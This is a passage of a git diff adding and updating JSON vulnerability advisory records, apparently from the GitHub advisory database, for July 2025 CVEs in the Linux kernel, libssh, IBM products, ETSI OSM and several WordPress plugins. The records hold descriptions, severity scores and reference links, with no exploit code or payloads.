for\nthem at close_ctree(), and by running delayed iputs after wait for the\nreclaim workers to finish and before setting the bit.\n\nThis race was recently introduced by commit 19e60b2a95f5 (\"btrfs: add\nextra warning if delayed iput is added when it's not allowed\"). Without\nthe new validation at btrfs_add_delayed_iput(), \n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38358" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4693cda2c06039c875f2eef0123b22340c34bfa0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a26bf338cdad3643a6e7c3d78a172baadba15c1a" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cvm7-wwgm-g3q3/GHSA-cvm7-wwgm-g3q3.json b/advisories/unreviewed/2025/07/GHSA-cvm7-wwgm-g3q3/GHSA-cvm7-wwgm-g3q3.json new file mode 100644 index 0000000000000..2840bc9605ab1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cvm7-wwgm-g3q3/GHSA-cvm7-wwgm-g3q3.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvm7-wwgm-g3q3", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38360" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add more checks for DSC / HUBP ONO guarantees\n\n[WHY]\nFor non-zero DSC instances it's possible that the HUBP domain required\nto drive it for sequential ONO ASICs isn't met, potentially causing\nthe logic to the tile to enter an undefined state leading to a system\nhang.\n\n[HOW]\nAdd more checks to ensure that the HUBP domain matching the DSC instance\nis appropriately powered.\n\n(cherry picked from commit da63df07112e5a9857a8d2aaa04255c4206754ec)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38360" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0d57dd1765d311111d9885346108c4deeae1deb4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3f4e601bc6765e4ff5f42cc2d00993c86b367f7e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/646442758910d13f9afc57f38bc0a537c3575390" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f2rv-3fq7-vhpv/GHSA-f2rv-3fq7-vhpv.json b/advisories/unreviewed/2025/07/GHSA-f2rv-3fq7-vhpv/GHSA-f2rv-3fq7-vhpv.json new file mode 100644 index 0000000000000..6aa318e644a42 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f2rv-3fq7-vhpv/GHSA-f2rv-3fq7-vhpv.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f2rv-3fq7-vhpv", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-8158" + ], + "details": "A vulnerability was found in PHPGurukul Login and User Management System 3.3. It has been declared as critical. This vulnerability affects unknown code of the file /admin/yesterday-reg-users.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8158" + }, + { + "type": "WEB", + "url": "https://github.com/secfake/mycve/issues/3" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317572" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317572" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620608" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f462-4c2j-6qcw/GHSA-f462-4c2j-6qcw.json b/advisories/unreviewed/2025/07/GHSA-f462-4c2j-6qcw/GHSA-f462-4c2j-6qcw.json new file mode 100644 index 0000000000000..b6c9e88b418ac --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f462-4c2j-6qcw/GHSA-f462-4c2j-6qcw.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f462-4c2j-6qcw", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38391" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: altmodes/displayport: do not index invalid pin_assignments\n\nA poorly implemented DisplayPort Alt Mode port partner can indicate\nthat its pin assignment capabilities are greater than the maximum\nvalue, DP_PIN_ASSIGN_F. In this case, calls to pin_assignment_show\nwill cause a BRK exception due to an out of bounds array access.\n\nPrevent for loop in pin_assignment_show from accessing\ninvalid values in pin_assignments by adding DP_PIN_ASSIGN_MAX\nvalue in typec_dp.h and using i < DP_PIN_ASSIGN_MAX as a loop\ncondition.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38391" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/114a977e0f6bf278e05eade055e13fc271f69cf7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f535517b5611b7221ed478527e4b58e29536ddf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/45e9444b3b97eaf51a5024f1fea92f44f39b50c6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/47cb5d26f61d80c805d7de4106451153779297a1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5581e694d3a1c2f32c5a51d745c55b107644e1f8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/621d5a3ef0231ab242f2d31eecec40c38ca609c5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/af4db5a35a4ef7a68046883bfd12468007db38f1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c93bc959788ed9a1af7df57cb539837bdf790cee" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f5fc-m65h-gr9j/GHSA-f5fc-m65h-gr9j.json b/advisories/unreviewed/2025/07/GHSA-f5fc-m65h-gr9j/GHSA-f5fc-m65h-gr9j.json new file mode 100644 index 0000000000000..0bf28cd311275 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f5fc-m65h-gr9j/GHSA-f5fc-m65h-gr9j.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5fc-m65h-gr9j", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38429" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: mhi: ep: Update read pointer only after buffer is written\n\nInside mhi_ep_ring_add_element, the read pointer (rd_offset) is updated\nbefore the buffer is written, potentially causing race conditions where\nthe host sees an updated read pointer before the buffer is actually\nwritten. Updating rd_offset prematurely can lead to the host accessing\nan uninitialized or incomplete element, resulting in data corruption.\n\nInvoke the buffer write before updating rd_offset to ensure the element\nis fully written before signaling its availability.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38429" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0007ef098dab48f1ba58364c40b4809f1e21b130" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/44b9620e82bbec2b9a6ac77f63913636d84f96dc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6f18d174b73d0ceeaa341f46c0986436b3aefc9a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f704a80d9fa268e51a6cc5242714502c3c1fa605" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f75j-r62m-hxmw/GHSA-f75j-r62m-hxmw.json b/advisories/unreviewed/2025/07/GHSA-f75j-r62m-hxmw/GHSA-f75j-r62m-hxmw.json new file mode 100644 index 0000000000000..77bff3b67e03a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f75j-r62m-hxmw/GHSA-f75j-r62m-hxmw.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f75j-r62m-hxmw", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38375" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: ensure the received length does not exceed allocated size\n\nIn xdp_linearize_page, when reading the following buffers from the ring,\nwe forget to check the received length with the true allocate size. This\ncan lead to an out-of-bound read. This commit adds that missing check.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38375" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/11f2d0e8be2b5e784ac45fa3da226492c3e506d8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/315dbdd7cdf6aa533829774caaf4d25f1fd20e73" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6aca3dad2145e864dfe4d1060f45eb1bac75dd58" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/80b971be4c37a4d23a7f1abc5ff33dc7733d649b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/982beb7582c193544eb9c6083937ec5ac1c9d651" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bc68bc3563344ccdc57d1961457cdeecab8f81ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ffxp-vqfg-26jp/GHSA-ffxp-vqfg-26jp.json b/advisories/unreviewed/2025/07/GHSA-ffxp-vqfg-26jp/GHSA-ffxp-vqfg-26jp.json new file mode 100644 index 0000000000000..afe6b7ea58c7c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ffxp-vqfg-26jp/GHSA-ffxp-vqfg-26jp.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffxp-vqfg-26jp", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38430" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: nfsd4_spo_must_allow() must check this is a v4 compound request\n\nIf the request being processed is not a v4 compound request, then\nexamining the cstate can have undefined results.\n\nThis patch adds a check that the rpc procedure being executed\n(rq_procinfo) is the NFSPROC4_COMPOUND procedure.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38430" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1244f0b2c3cecd3f349a877006e67c9492b41807" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2c54bd5a380ebf646fb9efbc4ae782ff3a83a5af" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/425efc6b3292a3c79bfee4a1661cf043dcd9cf2f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/64a723b0281ecaa59d31aad73ef8e408a84cb603" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7a75a956692aa64211a9e95781af1ec461642de4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b1d0323a09a29f81572c7391e0d80d78724729c9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bf78a2706ce975981eb5167f2d3b609eb5d24c19" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e7e943ddd1c6731812357a28e7954ade3a7d8517" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fpr2-pgq7-qwg4/GHSA-fpr2-pgq7-qwg4.json b/advisories/unreviewed/2025/07/GHSA-fpr2-pgq7-qwg4/GHSA-fpr2-pgq7-qwg4.json new file mode 100644 index 0000000000000..ec10513a12738 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fpr2-pgq7-qwg4/GHSA-fpr2-pgq7-qwg4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fpr2-pgq7-qwg4", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:45Z", + "aliases": [ + "CVE-2025-8114" + ], + "details": "A flaw was found in libssh, a library that implements the SSH protocol. When calculating the session ID during the key exchange (KEX) process, an allocation failure in cryptographic functions may lead to a NULL pointer dereference. This issue can cause the client or server to crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8114" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-8114" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fr6m-vhh9-9qj8/GHSA-fr6m-vhh9-9qj8.json b/advisories/unreviewed/2025/07/GHSA-fr6m-vhh9-9qj8/GHSA-fr6m-vhh9-9qj8.json new file mode 100644 index 0000000000000..463b578c27174 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fr6m-vhh9-9qj8/GHSA-fr6m-vhh9-9qj8.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr6m-vhh9-9qj8", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38434" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"riscv: Define TASK_SIZE_MAX for __access_ok()\"\n\nThis reverts commit ad5643cf2f69 (\"riscv: Define TASK_SIZE_MAX for\n__access_ok()\").\n\nThis commit changes TASK_SIZE_MAX to be LONG_MAX to optimize access_ok(),\nbecause the previous TASK_SIZE_MAX (default to TASK_SIZE) requires some\ncomputation.\n\nThe reasoning was that all user addresses are less than LONG_MAX, and all\nkernel addresses are greater than LONG_MAX. Therefore access_ok() can\nfilter kernel addresses.\n\nAddresses between TASK_SIZE and LONG_MAX are not valid user addresses, but\naccess_ok() let them pass. That was thought to be okay, because they are\nnot valid addresses at hardware level.\n\nUnfortunately, one case is missed: get_user_pages_fast() happily accepts\naddresses between TASK_SIZE and LONG_MAX. futex(), for instance, uses\nget_user_pages_fast(). This causes the problem reported by Robert [1].\n\nTherefore, revert this commit. TASK_SIZE_MAX is changed to the default:\nTASK_SIZE.\n\nThis unfortunately reduces performance, because TASK_SIZE is more expensive\nto compute compared to LONG_MAX. But correctness first, we can think about\noptimization later, if required.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38434" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/890ba5be6335dbbbc99af14ea007befb5f83f174" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f8b1898748dfeb4f9b67b6a6d661f354b9de3523" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fe30c30bf3bb68d4a4d8c7c814769857b5c973e6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-frwj-r649-j5gf/GHSA-frwj-r649-j5gf.json b/advisories/unreviewed/2025/07/GHSA-frwj-r649-j5gf/GHSA-frwj-r649-j5gf.json new file mode 100644 index 0000000000000..9f60eb64af8cc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-frwj-r649-j5gf/GHSA-frwj-r649-j5gf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frwj-r649-j5gf", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-6262" + ], + "details": "The muse.ai video embedding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's muse-ai shortcode in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6262" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/muse-ai/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/790d6336-0c16-4058-9ddb-d182ef56263c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fwp5-77ch-c7c8/GHSA-fwp5-77ch-c7c8.json b/advisories/unreviewed/2025/07/GHSA-fwp5-77ch-c7c8/GHSA-fwp5-77ch-c7c8.json new file mode 100644 index 0000000000000..8ef46fb33c4b2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fwp5-77ch-c7c8/GHSA-fwp5-77ch-c7c8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwp5-77ch-c7c8", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:45Z", + "aliases": [ + "CVE-2025-33109" + ], + "details": "IBM i 7.2, 7.3, 7.4, 7.5, and 7.6 is vulnerable to a privilege escalation caused by an invalid database authority check. A bad actor could execute a database procedure or function without having all required permissions, in addition to causing denial of service for some database actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33109" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240410" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-250" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json b/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json index 029e854741d6b..bec5797721bf1 100644 --- a/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json +++ b/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g98p-wqr8-r32r", - "modified": "2025-07-25T00:30:20Z", + "modified": "2025-07-25T15:30:45Z", "published": "2025-07-25T00:30:20Z", "aliases": [ "CVE-2025-22165" @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-269" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-gcxf-rh2w-2m9p/GHSA-gcxf-rh2w-2m9p.json b/advisories/unreviewed/2025/07/GHSA-gcxf-rh2w-2m9p/GHSA-gcxf-rh2w-2m9p.json new file mode 100644 index 0000000000000..ebc9971fcd813 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gcxf-rh2w-2m9p/GHSA-gcxf-rh2w-2m9p.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcxf-rh2w-2m9p", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38363" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: Fix a possible null pointer dereference\n\nIn tegra_crtc_reset(), new memory is allocated with kzalloc(), but\nno check is performed. Before calling __drm_atomic_helper_crtc_reset,\nstate should be checked to prevent possible null pointer dereference.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38363" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/31ac2c680a8ac11dc54a5b339a07e138bcedd924" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5ff3636bcc32e1cb747f6f820bcf2bb6990a7d41" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/780351a5f61416ed2ba1199cc57e4a076fca644d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/99a25fc7933b88d5e16668bf6ba2d098e1754406" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ab390ab81241cf8bf37c0a0ac2e9c6606bf3e991" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ac4ca634f0c9f227538711d725339293f7047b02" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c7fc459ae6f988e0d5045a270bd600ab08bc61f1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gvh3-f4g3-c9ff/GHSA-gvh3-f4g3-c9ff.json b/advisories/unreviewed/2025/07/GHSA-gvh3-f4g3-c9ff/GHSA-gvh3-f4g3-c9ff.json new file mode 100644 index 0000000000000..8691f92d1acf3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gvh3-f4g3-c9ff/GHSA-gvh3-f4g3-c9ff.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvh3-f4g3-c9ff", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:45Z", + "aliases": [ + "CVE-2025-33013" + ], + "details": "IBM MQ Operator LTS 2.0.0 through 2.0.29, MQ Operator CD 3.0.0, 3.0.1, 3.1.0 through 3.1.3, 3.3.0, 3.4.0, 3.4.1, 3.5.0, 3.5.1, 3.6.0, and MQ Operator SC2 3.2.0 through 3.2.13 Container could disclose sensitive information to a local user due to improper clearing of heap memory before release.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33013" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240431" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-244" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gw8j-hp25-g47g/GHSA-gw8j-hp25-g47g.json b/advisories/unreviewed/2025/07/GHSA-gw8j-hp25-g47g/GHSA-gw8j-hp25-g47g.json new file mode 100644 index 0000000000000..bc8004478eca4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gw8j-hp25-g47g/GHSA-gw8j-hp25-g47g.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw8j-hp25-g47g", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2024-48729" + ], + "details": "An issue in ETSI Open-Source MANO (OSM) v.14.x, v.15.x allows a remote attacker to escalate privileges via the /osm/admin/v1/users component", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48729" + }, + { + "type": "WEB", + "url": "https://www.osmium.solutions/articles/osm-mano-vulnerability-discovery.html#3" + }, + { + "type": "WEB", + "url": "http://etsi.com" + }, + { + "type": "WEB", + "url": "http://open.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h43f-3486-2w3c/GHSA-h43f-3486-2w3c.json b/advisories/unreviewed/2025/07/GHSA-h43f-3486-2w3c/GHSA-h43f-3486-2w3c.json new file mode 100644 index 0000000000000..d8ec356347c0b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h43f-3486-2w3c/GHSA-h43f-3486-2w3c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h43f-3486-2w3c", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:42Z", + "aliases": [ + "CVE-2025-7437" + ], + "details": "The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebook_store_save_form function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7437" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ebook-store/trunk/functions.php#L2442" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3328355" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0dc5c05d-51b7-4aee-bb4e-366ded45c4d8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h56q-f656-qf6w/GHSA-h56q-f656-qf6w.json b/advisories/unreviewed/2025/07/GHSA-h56q-f656-qf6w/GHSA-h56q-f656-qf6w.json new file mode 100644 index 0000000000000..c657cc2729143 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h56q-f656-qf6w/GHSA-h56q-f656-qf6w.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h56q-f656-qf6w", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-4608" + ], + "details": "The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sc_fs_local_business shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4608" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/structured-content/tags/1.6.4/class-structuredcontent.php#L188" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/structured-content/tags/1.6.4/templates/shortcodes/local-business.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/structured-content/#developers" + }, + { + "type": "WEB", + "url": 